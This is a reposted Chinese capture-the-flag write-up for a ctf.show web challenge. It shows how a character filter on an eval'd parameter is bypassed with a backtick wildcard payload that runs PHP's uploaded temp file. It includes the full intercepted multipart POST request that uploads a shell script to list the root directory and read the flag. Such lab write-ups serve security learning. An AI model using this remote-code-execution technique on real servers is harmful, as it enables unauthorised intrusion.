查看源代码,按注释提示,构造参数试试?cmd=aa ctf.show_红包题 ctf.show_红包题 where is the flag?
查看源代码,按注释提示,构造参数试试?cmd=aa
ctf.show_红包题 ctf.show_红包题
where is the flag?
源码中过滤了很多东西,可以使用的字符:p ` ? / + < > =
通过可用的字符构造cmd=?>=`.+/??p/p?p??????`,由eval($cmd)来运行临时文件
备注:问号?代表一个任意字符,通配符/??p/p?p??????匹配/tmp/PHPxxxxxx
构造payload
?cmd=?>=`.+/??p/p?p??????`;
然后bp抓包,修改这几个地方,发现根目录下有flag.txt
POST /?cmd=?>=`.+/??p/p?p??????`; Http/1.1
Host: 4947507e-e5ac-452c-8f01-80f5309742d9.challenge.ctf.show
User-Agent: Mozilla/5.0 (windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/WEBp,*/*;q=0.8
Content-Type: multipart/fORM-data; boundary=---------------------------10242300956292313528205888
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 237
-----------------------------10242300956292313528205888
Content-Disposition: form-data; name="fileUpload"; filename="1.txt"
Content-Type: text/plain
#! /bin/sh
ls /
-----------------------------10242300956292313528205888--
修改命令为cat /flag.txt 得到flag
来源地址:https://blog.csdn.net/weixin_45908624/article/details/128786662
--结束END--
本文标题: CTFshow--web--红包题第二弹
本文链接: https://lsjlt.com/news/409106.html(转载时请注明来源链接)
有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
回答
回答
回答
回答
回答
回答
回答
回答
回答
回答
0